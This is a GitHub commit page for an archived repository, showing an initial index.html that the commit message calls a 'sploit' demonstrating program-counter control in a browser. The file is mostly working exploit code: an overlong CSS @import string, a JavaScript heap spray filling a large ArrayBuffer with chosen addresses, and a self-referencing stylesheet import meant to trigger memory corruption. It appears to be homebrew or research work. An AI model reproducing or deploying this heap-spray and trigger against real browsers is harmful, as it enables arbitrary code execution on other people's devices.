Skip to content
This repository has been archived by the owner on Aug 12, 2021. It is now read-only.

Commit

Permalink
Initial upload
Browse files Browse the repository at this point in the history
Just a demonstration of PC control, which is most of the battle here.  The url of the index.html probably needs to be 35 chars. The sploit is sensitive to url length.
  • Loading branch information
zoogie authored and zoogie committed Dec 4, 2020
1 parent 9bb3a30 commit 3fad412
Showing 1 changed file with 19 additions and 0 deletions.
19 changes: 19 additions & 0 deletions index.html
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@
@import "#4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444 44444444444444444444444";
<script>
function spray(size) {
var obj= new ArrayBuffer(size);
var payload = new Uint32Array(obj);
for(var i=0; i < 0x200000/4;i++){
payload[i]=0x09202204;
}
payload[0xbc020/4]=0x09202100;
//payload[0xbc040/4]=0x09202004;
payload[0xbc204/4]=0x09202204;
payload[0xbc220/4]=0xDEADC0DF;
}
spray(0x2000000);

</script>
<style>
@import "index.html";
</style>

0 comments on commit 3fad412

Please sign in to comment.